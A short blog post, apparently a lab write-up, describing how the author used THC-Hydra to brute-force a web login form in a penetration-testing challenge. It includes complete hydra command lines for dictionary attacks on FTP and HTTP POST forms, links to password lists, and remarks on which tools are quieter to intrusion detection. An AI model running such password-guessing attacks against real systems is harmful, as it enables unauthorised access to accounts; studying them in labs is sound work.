пʼятниця, 19 січня 2018 р.

Working with THC-Hydra


Recently I have solved one easy challenge on one of the virtual penetration labs.
It was web application security challenge. There is a login form, and you have to guess a password. The login is shown as a title of login page :)
I decided to use THC-Hydra, famous login cracker.
Simple example of using hydra:

hydra -l admin -P common_passwords.txt ftp://localhost/

You can find the passwords list here: https://github.com/danielmiessler/SecLists/tree/master/Passwords
or here: https://wiki.skullsecurity.org/Passwords

BTW, there are 'nocount' and 'withcount' in title of passwords files. In case of  file with count in title, it will be considered the try rate of the attacked server and its channel.

As I encountered with web-based form, my attack was a slight different. It's because there are another URL parameters (POST attributes) and other response in case of success/failure (somethimes a failure response doesn't look like failure response).
Here is a typical information for attacking web-based form:

hydra localhost http-form-post "/path_to_page_with_porm.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o http-post-attack-result.txt

Host = localhost
Method = http-form-post
URL = /path_to_page_with_porm.php
Form parameters = user=^USER^&pass=^PASS^
Failure response = Bad login
Users file = users.txt
Password file = pass.txt
Threads = -t 10
Wait for timeout = -w 30
Output file = -o http-post-attack-result.txt

I took this brilliant explanation in this great post!
Using Hydra to dictionary-attack web-based login forms

I had to guess only password, without login, so I modified my attack command to the next:

hydra -l '' -P pass.txt localhost http-post-form "/path_to_page_with_porm.php:pass=^PASS^:F=Bad login" -t 10 -w 30 -o http-post-attack-result.txt


Also, some http interceptor always can be useful. For instance:

  1. OWASP ZAP - free, good for studying, but causes many alerts  in Intrusion Detection Systems (IDS)
  2. Burp Suite - not free, more sophisticated and has more features, also quite silence regarding to IDS 
In the same way I can compare network scanners:
  1. Nikto - free, good for studying, causes IDS alerts
  2. nmap - free, easy to use and silence (The Matrix, hello :))

о

Немає коментарів:

Дописати коментар

Підписатися на: Дописати коментарі (Atom)

Books and Multimedia data structure

I'm developing web application, diary for travelers. And I have 'Books' and 'Multimedia' pages. The functionality of the...

  • Working with THC-Hydra
    Recently I have solved one easy challenge on one of the virtual penetration labs. It was web application security challenge. There is a ...
  • Instant messenger implementation
    Database structure There are many answers on Stack Overflow and many articles on Internet about possible database structure for instant me...
  • Books and Multimedia data structure
    I'm developing web application, diary for travelers. And I have 'Books' and 'Multimedia' pages. The functionality of the...